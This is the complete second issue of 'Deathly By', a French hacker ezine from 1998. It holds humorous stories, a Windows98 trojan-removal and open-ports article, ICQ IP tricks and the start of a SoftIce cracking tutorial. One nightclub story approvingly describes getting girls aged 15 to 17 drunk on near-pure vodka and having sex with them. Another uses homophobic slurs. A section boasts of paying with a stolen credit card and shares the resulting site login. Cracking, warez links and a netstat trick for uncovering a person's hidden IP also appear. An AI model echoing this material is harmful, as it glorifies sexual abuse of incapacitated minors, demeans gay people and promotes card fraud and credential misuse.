Septembre 1998              -- DeAtHlY-bY mAgAzInE 2 --  Final Version       
                                                                77
                                                              77
   ÜÜÜÜ    ÜÜÜÜÜÜ    ÜÜÜ     ÜÜÜÜÜÜÜÜ  ÜÜ     Üá   ÜÜ     ÜÜ    ÜÜ
   ²   ²   ²        ²   ²       ²²     ²²     ²²   ²²     ²² 77 ²²
   ²   ²   ²       ²     ²      ²²     ²²     ²²   ²²      ²²  ²²
   ²   ²   ²²²²   Í²²²²²²²=     ²²     ²²²²²²²²²   ²²    77 ²²²²
   ²   ²   ²       ²²   ²²      ²²     ²²     ²²   ²²  77    ²²
   ²   ²   ²       ²²   ²²      ²²     ²²     ²²   ²²77      ²²
   ²²²²    ²²²²²²  ²²   ²²      ²²     ²²     ²²   77²²²²    ²² 
                                                 77
                                77             77     /\/\/\/\/\/\/\/\/\/\/\
                     888         77          77        We Are Here For Your
                88888   8         77       77                 Unique
                8 ²²   8           77    77                  Pleasure !
                 8   8              77 77              /\/\/\/\/\/\/\/\/\/\
                  8   88888          77
                   8       888         77
                    8   ²²  8888         77
                     8   888               77
                      888


------------------------------------------------------------------------------------------------
                                         EDITARD 

Donc nous voila reparti pour le 2 eme n° de Deathlyby encore plus fort que jamais :)
Au fait, HeartWork666 nous a quitté (trop de travail), mais vous pouvez quand meme
le contacter par mail.
Lisez ce zine avec la résolution 800*600 ou plus, mais pas moins :)
Bon, on va rester un an sur cet EDITARD GO GO GO GO!   

Note de Fugitif:
Bon j'ai forcé un peu sur Linux, mais je suis sur que ca servira à pas mal de monde :)

Note de Cedru :
Pourquoi je ne mettrais pas moi aussi une note??? j'ai forcé dans la connerie dans ce numero
desoler!!! je recommencerais pas! 
Mais non mon fugitig tu n'as pas forcé sur le linux,il y a que la moitié du zine qui parle
de ce fameux linux pour les elites! ;)

------------------------------------------------------------------------------------------------
 
               !VIVE LA DEMOCRATIE, LIBERTES EGALITES FRATERNITES!
                               FUCK OPPRESSION...go to hell!
                               FUCK REPRESSION...go to hell!

------------------------------------------------------------------------------------------------
DiskLamez:  Le texte qui constitue l'essence de ce zine est constitue
d'informations a but EXPLICATIF UNIQUEMENT...

        IL EST STRICTEMENT INTERDIT PAR LA LOI DE LIRE LA SUITE!!!
                        ENCORE MOINS DE FAIRE C'KY A ECRIT!
                             JE NE SUIS PAS RESPONSABLE!!!
                                    SUICIDE MAY CAUSE DEATH  !!!!!!!!

------------------------------------------------------------------------------------------------
                        OFFicierz:

                        HeartWork666
                                 --> HeartWork666@hotmail.com

                        Cedru
                                 -->Cedru13@hotmail.com

                        Fugitif
                                 -->Fugitif@hotmail.com

                        AnD98
                                 -->And2064@bigfoot.com

                        FuNzZy
                                 -->FuNzZy@Hotmail.com

				Page Web:

				http://members.xoom.com/deathlyby/

				Vous y trouverez des progs, des liens et bien sur les n° du zine...

------------------------------------------------------------------------------------------------
                 

		Rejoignez nous en IrcNet #infonie, #france, #warez-france etc...

On recherche des pros du hack en france, et des pros du phreak de cellulaires
REJOIGNEZ NOUS!
Si vous voulez ecrire un article pour DEATHLY BY, n'hésitez pas !
envoyez le à mon Email, je me ferais un plaisir de vous intégrer à l'équipe !

------------------------------------------------------------------------------------------------



************************************************************************************************
                                        Sommmaire


                        --  Les meilleurs site Web By Cedru
                        --  Une journée en classe avec Cedru  2/2
                        --  Une Soiree en boite avec Cedru
                        --  Une Soiree en boite avec Cedru (la revanche)
                        --  Linux Vs Windonws98 By Cedru
                        --  Jouer avec ICQ By AnD98
                        --  Les sites de cul et leurs fuckin passwords By AnD98
                        --  Cracking: Soft Ice...   By FuNzZy
                        --  Cracking: Cracker mIRC 5.41...   By FuNzZy
				--  Comment s'amuser sur l'ordi d'une victime? By Fugitif
                        --  Ca te dirait un peu de carding?(2/2) By Fugitif
				--  Installer Linux et quelques trucs de base... By Fugitif
				--  Se connecter à Internet avec Linux By Fugitif
				--  Quelques petites astuces Linux By Fugitif
                        --  Mieux comprendre les droits des fichiers et des repertoires sous                              			          Linux. By Fugitif
				--  Quelques progs de hacking Linux By Fugitif
				--  Petite astuce pour les truc de charme By Fugitif
                        --  Etre proteger sur le net sous WIN By Fugitif
				--  Maintenant que je maitrise Linux. Je fais quoi? By Fugitif
				--  Dans le prochain n°...
                        --  Le mot de la fin.

================================================================================================
                           Les meilleurs site Web    By Cedru
================================================================================================


Un site de recherche sur les ftp,vous mettez le nom du fichier que vous voulait
,et il vous sort la liste des sites avec le fichier desirez.
http://ftpsearch.ntnu.no/

Un bon site pour trouver des émulateurs et des roms (jeux arcade,Nintendo,Sega...)
http://hem.passagen.se/ogg/

Le classement des 50 meilleurs sites MP3 (MP3=fichier son compressé)
http://www.village21.com/t50_cgi/clk_50.exe?ID=brozman@rozmans.com

Un superbe site pour écouter du hard rock avec Real audio (radio et les news... instantanné)
http://www.hardradio.com/hr3lead.html

Le meilleur site pour trouver des sites de Warez 24h sur 24, il est
réactualiser tous les jours.
http://www.jaznet.com/topsites/

La page de notre magazine super genial!!
http://members.xoom.com/deathlyby/

================================================================================================
         Une journée en classe avec Cedru  2/2 et fin de cette connerie!! :) By Cedru
================================================================================================

Bon voila la suite de cette affreuse connerie,je sais même pas pourquoi j'écris ca?
Il y a t-il des gens qui aiment ce que j'écris?? Si oui,email moi pour me motiver a
écrire d'autres conneries pareilles!! :) cedru13@hotmail.com
Bon alors le type se rapproche du professeur et le professeur commence a paniquer!
(Je suis comme les chiens, je sens quand quelqu'un panique!! :)
Bon la l'élève s'arrete et lui dit : Bah c'est pas moi qui lance les craies!! 
Ca c'est la phrase que tous les élèves cons disent aux professeurs!!
(C'est pas moi,c est le voisin!! ;)!! )
Et le menace de lui casser la gueule si il est pas content (je résume en gros!!)
Et puis le professeur lui dit ok tu peux alez te rassoir! voila encore un con qui
a échapper a la sentance! ;))
Vengeance!! :) il se retourne pour écrire au tableau et ca recommence de plus belle!
Puis c'est toujours les mêmes qui trinquent c'est a dire : (les arabes,les etrangers..)
Bon bah ca à durée toute l'année comme ca, et je suis pas fier de moi!! :)
Je suis content car j'ai pu me perfectionner sur ma HP 48gx, et je m'y connais un
peu plus en moto , à force de lire des magazines de moto!
Puis le professeur a passé toute l'année a écrire au tableau pour des élèves invisibles!
Fin mai tout le monde etait partit! et je passe en terminale informatique!! :) yeah!!!
Voila c est deja finit!! :) putain je fais pas des romans moi!!!
Ah oui entre 2 heures de cours on s'emmerdait tellement que je suis partit avec ma moto
chercher de la Vodka a l'épicier du coin,ca c est bourrer la gueule je vous dis pas!! :)
Il y avait pas de jus de pomme pour couper la vodka,un type a prit 2 verres de vodka pur
d un seul trait! il etait tout rouge, et il tituber quand il est sortit du cours! :)
mort de rire!!!
Bon au prochain numero je vais écrire des articles sur la moto de Cedru!!! :) non je rigole
The End !!!
Enfin j'ai finit!! ;))


================================================================================================
                           Une Soiree en boite avec Cedru  By Cedru
================================================================================================


Bon me revoici dans mes périples quotidiens!!
Je vais essayer,je dis bien essayer! de faire plus long cet article!!
Car un article de 30 lignes c'est pas raisonnable je trouve! ;))
Tout d'abord je suis heureux de recevoir des emails des gens me disant que le zine
est bien!! :) mon email encore : cedru13@hotmail.com
Bon tout commence dans la préparation pour aller en boite! :)
Regardez vous ,et dites vous?
Je veux ressember a un type classique?,a un Boys band?,a une dragqueen? ou un Grunge ???
(on traite ici les gens de grunge, les gens ecoutant du hard rock avec les cheveux long)
Bon moi j'ai prit la méthode 1,mélanger a la 2!! :) c'est a dire :
J'avais un jean en toile belge (très classe,le hic c'est que j'avais une tâche de moutarde
dessus! ;) j'avais manger une merguez avec de la moutarde, et les gens me connaissant savent
que je m'en mets partout!! :) j ai reussi a enlever la tâche avec la salive!! :) je suis degueux!
Bon revenons a mon accoutrement,j'avais une chemise (quicksilver si vous voulez tout savoir! :) ,
chemise normal quoi!! ? ;) avec un maillot de corps Levi's moulant mon torse musclé! 
Pour impressionner que je mets ce truc levi's!! les gens se disent :
Bah c est un type accoutré normalement, puis la j'enlève ma chemise , et les gens 
se disent : wow !!!! c est un boys band!!?? ;)))) Non c est le type qui fait le con sur la piste
Bon pour cet article je vais inventer 2 noms pour mes copains! :) on va dire Fred er Jean


- Bon 11H12 je suis arrivé avec mes 2 potes dans un Pub,on commande les boisons et la merguez
pour moi! J avais faim! :) ca arrive non?

11h 42
Je mange ma merguez frite! :)
Miam! miam!! merde putain j'ai de la moutarde sur mon jean's!! argh!!!! les videurs vont pas
me laisser entrer avec cette superbe tâche??
Fred : j'allais te dire de faire attention a pas te mettre de la moutarde sur ton 
jean's,mais c est deja trop tard!!
Bon bah je vais y aller a la dégeux!!
Je crache sur mes doigts , et je frotte sur mon jeans pour enlever cette tache tenace!
Fred : Putain la tâche a doubler!!!
Moi : Non faut attendre un peu je pense

5min plus tard la tâche est partie ouf!!!
Putain la je suis sur que vous vous dites : c est quoi ce blaireaux qui raconte de pareil
conneries??
Bon je vais continuer comme meme! ;)

11h52 on est devant la boite
Fred passe le premier!! "le videur le regarde d une drole de façon" il dit pour detendre
l'atmoshpere,il y a du monde??

Videur : "il fait un sourire"  oui ca commence a arriver

Jean : Il passe et ca fait Bip bip!! :) attendez monsieur! dit le videur,heu
c est mes docs qui fait sonner 

videur : ok ok vous pouvez passez!

Moi : Je passe moi no problem!! :) je fais 20 ans il parait donc pas de probleme.
20ans physiquement pas en age mentale!! :)

On est enfin dedans!! il y a une centaine de personnes pour l'instant.
On est sur la terasse a attendre un peu les amis qui passeront et mater les filles!
Puis je commence a regarder et je vois que des thons (laide,boutons,nez tordu,grosse...)
Ouh lallalala!!!! c est quoi cette boite?? une boite a thon?
90% des filles etaient franchement pas belle!
Je commence a me dire que j ai mal fait d aller dans cette boite.


12h 30
Bon ca commence a bouger,je vais sur le piste avec Jean!!
Fred reste dans un Box,il a la chiasse! ;))
Bon ca bouge pas mal,la musique est nul a chier comme d'habitude!! :) (j'aime que le hard rock)
Je commence a mettre des mains aux fesses sans me faire remarquer,genre je danse et j effleure
de la main pour toucher la marchandise,on se croirait au marcher aux poissons (je dirais même
aux thons!! ) mauvaise marchandise!! :)
Puis rien d'interessant,la je vois un mec se rapprochait de moi et qui danse devant moi et
me fait un sourire argh!!!!!!!! putain je me fais draguer par un PD!!!!!
La meilleur technique a adopter, c est de se retourner et de prier pour qu il y est pas de PD
derriere!! :) sinon vous etes mal!!
Puis ne pas se laisser prende par le coups du savon! :) la c est le coup du billet,ils laissent
tomber un billet et vous encule!! ;))) je rigole bien sur
Bon bah je crois que ca va etre une soirée  merdique!! il y a meme des vieux de 50ans qui
dansent sur la piste pff!!!! c est vraiment pas la journee pour allez en boite!

On avait prevut Fred,Jean et moi d avoir des sous (on avait 1500francs a 3) pour genre se bourrer 
une fille!! :) mais avec les thons et les PD on a pas voulu!
argh!!! A chier les boites!!!!!!
En général je me fais draguer une fois sur 2 par un PD, j attire les PD,je suis tres sexe!! ;)
Grrr!!!! Je suis pas PD!!!!!

4h du matin
Bon on se casse, car la les thons commencent a partir!! :) la sortie en boite !
Puis j ai rien bu ,tellement j'étais dégouté!!
pfff!!! ca m apprendra a allez en boite!

Voila ThE End
Telephonez comme moi au 08907898790 service des opprimés par les PD en boite!!

================================================================================================
                   Une Soiree en boite avec Cedru la revanche By Cedru
================================================================================================

Voila je suis de retour pour une sortie en boite!!
Objectif se bourrer une fille dans toutes les sens du terme!! AHAHAHH!!!
Ame sensible s'abstenir!!!

Bon je me suis munit de plein de fric pour cet objectif, avec mes 2 amis Fred Et Jean.
Bon je me suis habillé très classe comme à mon habitude! :)
On arrive directement en boite, car ils ont peur que je fasse le coup de la merguez comme la
dernière fois! :) (mais non je me salirais pas je vous dis!, mais bon ils m'écoutent jamais).

12h18 
YO!!!! on passe tous sans trop de problème

12h20 
Je suis dans la boite,je fais vite en 2min non? je me traine au bar avec les autres de la bande.

12h30
Bon il y a beaucoup de monde,on arrive péniblement devant le bar.
Je commence a sortir une liasse de billet de 500 francs (j avais 3000francs sur moi) j avais
économisé pour cette occasion.Bon une bouteille de vodka s'il vous plait!! puis servez les jeunes
filles à coté aussi (3 superbes nana entre 15 et 17ans) bah on peut pas en demander trop!! argh!!
On commence a discuter avec elle,genre les conneries habituelles,tu as quel age? tu bèses? oups! 
je rigole! :) vaut mieux pas.
Puis je commence a doser les verres d alcool (bon comme mon objectif est de saouler les filles,je
nous met une petite dose et pour les filles je mets presque que de la vodka , et une pincée de
pomme pour faire semblant!!!) Bon les filles font toujours les grimacent mais n'osent rien dire.
Bon elles commencent a etre bien a partir de 1h du mat

1h10
On est sur la piste avec les filles, et on se choisie les filles que l'on veut.On commence 
a danser sur cette musique de merde,j ai toujours pas change d avis sur la musique.

1h30
Elles sont bien fatiguer,on retourne au bar et je recommande une bouteille de vodka pour les
achever!! :) bon la une premiere succombe a l alcool et fred s'en occupe !!
Ils sortent faire un tour dehors,bah voyons!!! pour quoi faire je me le demande? 

1h45 
LA 2eme aussi est pêté,mais la on a un peu trop forcé sur les doses je crois!! :) elle a envie
de degueuler,putain Jean tu lui fais un effet boeuf? ;) ouf c etait pas la mienne!

1h50
Bon la 3eme est pour moi! :) elle est bien bourrer celle la aussi,mais ca va elle se porte bien
et je lui proposer d aller se faire un tour sur la terasse!

2h
bon c est pratiquement si je me la traine!! mais je vais y arriver je vous le dis!!
Bon la je l embrasse profitant de son agonie!! :)
Puis je lui demande si elle veut pas allez sur la plage?
Bah elle repond avec des moueh!!!

2h10
Bon je vois fred et sa copine entrain de faire des choses assez Hard!!
Tient je me dis,si on le faisait pas a 4? serait fun pour essayer!!
Voila je dis ca a Fred et il est partant et on commence a partouser
Mais bon je rentre pas dans les details!! :)

3H 
Jean se ramene seul,puis il crie putain venez je m emmerde moi la bas
Bon on laisse les 2 filles,elles sont un peu fatigue j ai l impression!

Bah voila!!! Vive l alcool et le sexe!!!!!!!!!!!!!!!!!!!!
The End!!
 
================================================================================================
                              Linux Vs Windonws98 By Cedru
================================================================================================

Bon voila je me suis dis : si je parlais un peu de linux et de windows98 (Windaube pour ceux
qui aiment dire ca ,et qui l'utilisent sans arret.Ils sont bien content d'etre sous un systeme
d explotation facile comme windaube,va installer linux et on en reparlera de windows!!!)
Car j'entends sans arret parler de linux de gens qui disent : linux c est pour les elites,avec ca
je te hack comme je veux (ce qui est pas vrai)
Je vais m'expliquer en ce qui concerne les risques de pénétrations de windows qui sont :
Un copain a vous, vous a passez le dernier anti nuke (mais qui est en faite le dernier trojan
à la mode , que je nome le socket de troie)
Donc vous le lancez ,et la ca dit fichier dll introuvable.....
Voila vous avez un port ftp d'ouvert sans que vous le sachiez , ou que windows vous le demande
poliment.Voila vous etes niquez comme qui dirait! :)
Bon je suis généreux , et je vous donne le truc pour enlever cette merde :
Vous avez le socket de troie la il faut effacer 3 fichiers:
C:\WINDOWS\RSRCLOAD.EXE
C:\WINDOWS\SYSTEM\CSMCTRL32.EXE
C:\WINDOWS\SYSTEM\MGADESKDLL.EXE

Vous risquez de ne pas pouvoir les effacer sous windows, alors redemarez en commandes ms-dos
natives (F8 au demarrage).
Il faut aussi effacer les cles qui correspondent dans la base de registre, mais ce n'est pas
obligatoire.
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Regardez toute les branches commencant par Run ,et effacez dedans toutes les cles qui
contiennent un des 3 noms de fichiers indiqués au dessus.

(Lorsque vous executez la bombe qui installe le cheval de troie, il vous indique parfois une
erreur comme quoi il ne trouve pas le fichier ISAPI32.DLL)


J'éclairci un point important : le fichier ISAPI32.DLL n'existe pas!!! Les applications qui le
demande ne sont autres que des bombes que je vous conseille d'effacer immédiatement.

Voila apres ca vous etes debarasse du socket de troie 2.3 ,mais si votre ami vous a passer un
.exe il peut etre d'une autre source que le socket de troie.Ca peut etre une autre sorte de
trojan,donc un conseil n'acceptez pas de .exe.
La dernier socket de troie fonctionne comme un virus.Vous ne pouvez le detecter, et insalle
un port ftp.Vous allez lancer le .exe, mais ca va marcher impeccablement.Ce que vous savez
pas, c est qu il fait 100ko de plus ,et qui lance ce fameux virus.
Donc mefiez vous! :)
Prudence!!!!Si vous n'acceptez jamais d'executable vous avez 90% de pas vous faire hacker! :)

Bon maitenant on peut vous hackez avec le systeme des ressources partages,si vous avez
une carte reseau à distance ceci vous concerne!!!
Verifiez dans votre explorateur windows que vous avez pas les ressources partages , et que vous
etes en lecture seul (personne ne peut prendre ou ecrire sur votre pc)
Des gens vont me dire oui j'ai les ressources partagés mais j'ai mit un mot de passe,donc
personne peut rentrer sans le mot de passe.Erreur!!! Sachez qu on peut entrer tres facilement.
Donc méfiance!! :)
Pour savoir comment hacker quelqu'un qui a les ressources partagés allez voir le premier 
numero de Death.C'est le fameux nbstat!!

Maintenant on peut rentrer sur votre pc si vous avez des ports qui sont ouverts
Port telnet,port Ftp.... Je vais vous donner une liste qui vous permettra de mieux savoir :



7/tcp
echo              7/udp
discard           9/tcp    sink null
discard           9/udp    sink null
systat           11/tcp
systat           11/tcp    users
daytime          13/tcp
daytime          13/udp
netstat          15/tcp
qotd             17/tcp    quote
qotd             17/udp    quote
chargen          19/tcp    ttytst source
chargen          19/udp    ttytst source
ftp-data         20/tcp
ftp              21/tcp
telnet           23/tcp
smtp             25/tcp    mail
time             37/tcp    timserver
time             37/udp    timserver
rlp              39/udp    resource       # resource location
name             42/tcp    nameserver
name             42/udp    nameserver
whois            43/tcp    nicname        # usually to sri-nic
domain           53/tcp    nameserver     # name-domain server
domain           53/udp    nameserver
nameserver       53/tcp    domain         # name-domain server
nameserver       53/udp    domain
mtp              57/tcp                   # deprecated
bootp            67/udp                   # boot program server
tftp             69/udp
rje              77/tcp    netrjs
finger           79/tcp
link             87/tcp    ttylink
supdup           95/tcp
hostnames        101/tcp   hostname       # usually from sri-nic
iso-tsap         102/tcp
dictionary       103/tcp   webster
x400             103/tcp                  # ISO Mail
x400-snd         104/tcp
csnet-ns         105/tcp
pop              109/tcp   postoffice
pop2             109/tcp                  # Post Office
pop3             110/tcp   postoffice
portmap          111/tcp
portmap          111/udp
sunrpc           111/tcp
sunrpc           111/udp
auth             113/tcp   authentication
sftp             115/tcp
path             117/tcp
uucp-path        117/tcp
nntp             119/tcp   usenet         # Network News Transfer
ntp              123/udp   ntpd ntp       # network time protocol (exp)
nbname           137/udp
nbdatagram       138/udp
nbsession        139/tcp
NeWS             144/tcp   news
sgmp             153/udp   sgmp
tcprepo          158/tcp   repository     # PCMAIL
snmp             161/udp   snmp
snmp-trap        162/udp   snmp
print-srv        170/tcp                  # network PostScript
vmnet            175/tcp
load             315/udp
vmnet0           400/tcp
sytek            500/udp
biff             512/udp    comsat
exec             512/tcp
login            513/tcp
who              513/udp    whod
shell            514/tcp    cmd          # no passwords used
syslog           514/udp
printer          515/tcp    spooler      # line printer spooler
talk             517/udp
ntalk            518/udp
efs              520/tcp                 # for LucasFilm
route            520/udp    router routed
timed            525/udp    timeserver
tempo            526/tcp    newdate
courier          530/tcp    rpc
conference       531/tcp    chat
rvd-control      531/udp    MIT disk
netnews          532/tcp    readnews
netwall          533/udp                 # -for emergency broadcasts
uucp             540/tcp    uucpd        # uucp daemon
klogin           543/tcp                 # Kerberos authenticated rlogin
kshell           544/tcp    cmd          # and remote shell
new-rwho         550/udp    new-who      # experimental
remotefs         556/tcp    rfs_server rfs   # Brunhoff remote filesystem
rmonitor         560/udp    rmonitord        # experimental
monitor          561/udp                     # experimental
garcon           600/tcp
maitrd           601/tcp
busboy           602/tcp
acctmaster       700/udp
acctslave        701/udp
acct             702/udp
acctlogin        703/udp
acctprinter      704/udp
elcsd            704/udp                     # errlog
acctinfo         705/udp
acctslave2       706/udp
acctdisk         707/udp
kerberos         750/tcp    kdc              # Kerberos authentication--tcp
kerberos         750/udp    kdc              # Kerberos authentication--udp
kerberos_master  751/tcp                     # Kerberos authentication
kerberos_master  751/udp                     # Kerberos authentication
passwd_server    752/udp                     # Kerberos passwd server
userreg_server   753/udp                     # Kerberos userreg server
krb_prop         754/tcp                     # Kerberos slave propagation
erlogin          888/tcp                     # Login and environment passing
kpop             1109/tcp                    # Pop with Kerberos
phone            1167/udp
ingreslock       1524/tcp
maze             1666/udp
nfs              2049/udp                    # sun nfs
knetd            2053/tcp                    # Kerberos de-multiplexor
eklogin          2105/tcp                    # Kerberos encrypted rlogin
rmt              5555/tcp   rmtd
mtb              5556/tcp   mtbd             # mtb backup
man              9535/tcp                    # remote man server
w                9536/tcp
mantst           9537/tcp                    # remote man server, testing
bnews            10000/tcp
rscs0            10000/udp
queue            10001/tcp
rscs1            10001/udp
poker            10002/tcp
rscs2            10002/udp
gateway          10003/tcp
rscs3            10003/udp
remp             10004/tcp
rscs4            10004/udp
rscs5            10005/udp
rscs6            10006/udp
rscs7            10007/udp
rscs8            10008/udp
rscs9            10009/udp
rscsa            10010/udp
rscsb            10011/udp
qmaster          10012/tcp
qmaster          10012/udp


Ca c'est une bonne liste!! :) donc si vous avez un des ports suivant ouvert, on peut acceder
a votre pc (ou en telnet ou en ftp....)
Donc faut les fermer! :) Vous avez des sniffer de ports a votre disposition.Vous pouvez savoir
grace à ca si votre ami a un port ouvert pour le hacker,ou bien vous avez un port ouvert sur votre pc 
c 'est pourquoi vous etes fait hacker! :)

Bon voila je vous ai donné la majorité des moyens de se faire hackers sous windows98
N'oubliez pas de proteger votre port139 qui peut se faire nuker,ce qui provoque une ecran bleu!:)
Donc si vous n'acceptez jamais de files et que vous avez pas de ressources partages.Il est
impossible de vous faire hackers.Et que vous avez pas de port actif ,et que vous avez bien 
patcher votre port 139.
Donc les personnes qui disent qu'avec linux il vous hack comme ils veulent, ce n'est pas vrai.
C est plus facile de rentrer sous windows98 avec linux,mais comme je l'ai dis en haut ,si vous
avez fait ce que j ai dit, il devrait pas avoir de problemes.
Linux sert a hackers d'autres gens sous linux! :) des serveurs sous linux (surtout), et des ftp.
Linux ne sert pas a hacker quelqu un sous win98.Il est oblige de passer par un port pour pouvoir
le faire,donc verifiez bien.
Par contre si vous avez linux alors la.... :) vous faites bien enculer,si vous avez
mal parametrer.Tout le monde peut rentrer!!! Vous avez mit un mot de passe mais avec des 
programmes tel que Cracker Jack, on peut trouver facilement votre password.
Donc Vive Windaube!! :) pour les jeux,la facilite d'installation,pour tout...
Linux c est bien si vous voulez hacker des serveur (provider de votre ville,site ftp....)


================================================================================================
                                Jouer avec ICQ By AnD98
================================================================================================

ICQ (I seek you) est un petit soft permettant de discuter par ecrit en direct ou par messages
differes sur Internet avec d'autres personnes possedant ce soft. L'interet majeur par rapport
a l'IRC est que sans doute qu'ICQ permet de voir si vos amis sont connectes pendant que vous
etes online. ICQ se lance automatiquement (d'origine) a chaque debut de connexion, envoie au
serveur principal ICQ l'information que vous etes connecte, et vos amis peuvent vous voir 
directement dans leur " carnet d'adresse " et vous envoyer des messages ou enamer un chat.
L'interface est pas top, mais 10 fois plus conviviale que Mirc par exemple sur IRC.
www.icq.com

Maintenant que vous devez tous avoir ce soft et vous savez vous en servir assez bien, je vous
propose que l'on s'amuse un peu avec. Comment modifier son adresse IP, trouver l'adresse IP 
d'un pote.
Pas grand chose de tres excitant, mais c'est une bonne base pour s'amuser. Si vouler des 
trucs vraiment performant, allez plutot faire un tour sur le web pour trouver des patchs pour 
ICQ qui vous permettront d'envoyer des floods de toutes sortes par exemple. Sachez cependant 
que l'usage de patchs ou de soft auxiliaire ne represente pour moi aucun acte de hacking, a moins
que vous ayez ecrit vous meme le code source de ce dernier, ou que vous compreniez 110% du mode 
de fonctionnement. C'est juste une petite note a part adressee a tout ces mecs qui se croient 
hacker ou autre simplement parcequ'ils savent rentrer une adresse ip dans un nuker par exemple...
M'enfin...

Alors voilà, amusons-nous un peu a rendre notre adresse IP invisible dans la partie des 
informations nous concernant. Il existe bien une option permettant A PRIORI de rendre celle ci
invisible, mais le mode de fonctionnement bidon d'ICQ (enfin, pas bidon, mais facilement 
contournable) fait en sorte que l'usage d'un petit patch sur votre version d'ICQ permet de rendre
visible toutes ces foutus adresses IP que vos amis pensaient vous avoir cache. Voilà qui en a 
trompe plus d'un (qui pensaient avoir leur adresse IP cachee, ce qui etait faux).
ICQ marche comme ca. Quand vous envoyez un message (ou une ligne de dialogue) a quelqu'un, 
vous lui envoyez (la plupart du temps) directment, sans passer par un serveur Icq qui s'occupera
de retransmettre le paquet. Pour envoyer directement un paquet a une personne, votre Icq doit
obligatoirement connaître l'adresse IP du destinataire (chose qui n'est pas vraie quand on
passe par un serveur icq). Disons que votre ami a cache son adresseip (avec l'option du soft),
et bien votre icq connaitra toujours l'adresse IP de votre ami, mais vous la cachera.
Pour resumer, quand vous cachez votre adresse IP, cela se passe chez votre coresspondant 
(c'est son soft qui va cacher votre adresse, pas le votre). Compris ? J'espere car c'est vraiment
pas complique.

Maintenant, vous pouvez modifiez sans aucun probleme l'adresse IP qui va apparaître sur vous.
Sans aucun probleme est un peu exagere, mais disons plutot sans aucune difficulte.
Pour cela, nous allons faire croire a Icq que nous passons par un proxy ou un firewall imaginaire
.On va pour cela configurer icq pour qu'il utilise l'adresse Ip de ce proxy plutot que la votre.
Voici les instructions :

ICQ MENU ( boutons en bas a gauche de la fenetre)à Preferences
Preferences à Connection
Connection à Selectionner " I'm using a permanent Internet connection (LAN) "
Selectionner " I'm behind a firewall or a proxy "
Cliquer sur " Firewall settings "
Slectionner " I'm using a Socks4 proxy server " puis cliquer sur " Next "
Dans la zone Socks4 Host, rentrez une adresse IP quelconque (ex : 123.456.789.101)
Cliquer sur Next, Done, puis OK.
Fermer ICQ, relancer-le, connectez-vous et voilà.

Regardez maintenant votre adresse IP avec icq, vous avez maintenat comme adresse l'ip bidon que
vous avez rentre comme etant celle de votre firewall virtuel.

Cela pose quelques problemes pour créer des chats (connectoins directes foireuses avec une fausse
ip) et envoyer des messages (parfois, pas tout le temps), mais on peut rire pas mal avec ce truc.
Par exemple vous prenez l'ip d'un pote, et lui demandez de comparer son ip avec la votre.
Ca sera la meme (si vous avez configure votre firewall pour qu'il ait l'ip du pote).
Petite blague sympa, genre : "J'utilise ta connection, je suis dans ton disque dur... "

J'ai decouvert cela par pur hasard en installant un proxy sur mon PC, et en me trompant dans 
la zone demandant l'ip du proxy. J'ai retrouve l'astuce quelques temps plus tard sur un site Web
(qui dvait deja etre la avant que je le decouvre), comme quoi tout le monde fait les memes
conneries. : ))

Maintenant, nous allons voir comment trouver l'adresse Ip d'un pote qui est vraiment invisible
avec ICQ, et meme trouver le port que sa machine utilise pour le reception et l'envoie avec icq.
Je rappelle que votre Icq doit obligatoirement connaître l'ip du destinataire lors de l'envoie
d'un message, donc si vous ne voyez pas l'adresse ip de votre pote, c'est juste que votre Icq 
vous la cache, mais il la connaît en fait.
La c'est assez simple, et on utilise juste une fenetre DOS (ouverte sous Win95/8).
Envoyez un message a la personne dont vous voulez savoir l'ip, et quelques secondes plus tard,
demandez un Netstat sous dos.
C:/netstat        -à c tou, netstat est inclus au dos pour surveiller l'etat d'une connection

Vous aurez quelque chose comme cela :

<Suite dans le prochain N°>



================================================================================================
                       Les sites de cul et leurs fuckin passwords By AnD98
================================================================================================

http://members.sexroulette.com/?acb=acb115645-a9999

Ce site me faisait chier a me demander un password, et a me demander par la mon numero de cb.
Alors j'ai rentre un bon numero juteux pour payer mon abonnement a l'annee en Gold access
(toutes options, 200 balles/mois je crois).
Si c'est ma cb ? Oula, non, elle, est a personne d'aillleur : )
Donc voilà un code pour http://members.sexroulette.com/?acb=acb115645-a9999 qui marche depuis
debut Juin .
Login : AnD981
Pass : vader

C'est un bon site je trouve, bien complet. Allez voir XTC girls je crois, c'est tres marrant.
Amusez-vous bien petits porcs (c'est humain, tout le monde fait pareil, a des remords de se dire
qu'il se branle devant son pc, mais bon... arf arf arf)

AnD98

================================================================================================
                          Cracking: Soft Ice...   By FuNzZy
================================================================================================
                                                         
Qu'est ce que Soft Ice ?
ßßßßßßßßßßßßßßßßßßßßßßßß

Ce programme est un debugueur Windows, il est tres utile et est le logiciel
le plus utilise pour cracker. Il permet de debuguer un programme windows
a son execution et de mettre des breackpoints sur des fenetres, des boutons...


Comment installer Soft Ice ?
ßßßßßßßßßßßßßßßßßßßßßßßßßßßß

Bon, on ne va pas passer 40 ans a expliquer cela mais nous allons tout de meme
en parler car certains problemes avec la carte graphique peuvent exister.
La version de Soft Ice que je vous conseil est la 3.2, elle resoud
pas mal de probleme d'affichage.
Pendant l'installation le programme va detecter votre carte graphique. Si le
nom y est inscrit ca devrait aller mais faites un test tout de meme.
Si votre carte, par contre n'y est pas et que le test ne fonctionne pas,
essayez de mettre standart VGA ou Universal Video Drivers.
A la fin de l'installation, le programme vous demandera s'il peut modifier
votre Autoexec.bat, la c'est a vous de voir, si vous voulez lancer Soft Ice
a chaque demarrage, ou si vous avez le courage de le lancer manuellement sous
Dos. Moi, j'ai choisi de mettre ces quelques lignes a la fin de mon Autoexec.bat:

Echo 1:Charger SoftIce
Echo 2:Ne pas charger SoftIce
C:\WINDOWS\COMMAND\choice /C:12 /T1,8 Choix? 
if errorlevel 2 goto PasCharger
C:\SIW95\WINICE.EXE
goto fin
:PasCharger
echo SOFTICE NON CHARGE !
:fin

Ces quelques lignes dans l'Autoexec.bat vous demandera si 1. vous charger
Soft Ice, si 2. Vous ne le chargez pas.
Si vous ne repondez dans les 8 secondes, Soft Ice se lancera automatiquement.


Son utilisation sous Windaube et ses commandes:
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß

Soft Ice, lorsqu'il est lance au demarrage est en memoire et il peut etre
appele a tous moments sous Windows grace a une pression des touches Ctrl+D
(Une deuxieme pression de Ctrl+D permet de sortir de Soft Ice !)
Nous voila dans Soft Ice.

Voici les touches du clavier les plus importantes:
F1:  Help, affiche toutes les commandes.
